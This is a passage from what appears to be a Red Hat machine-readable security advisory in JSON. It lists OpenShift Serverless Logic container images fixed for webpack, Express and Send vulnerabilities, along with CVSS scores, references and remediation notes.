"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
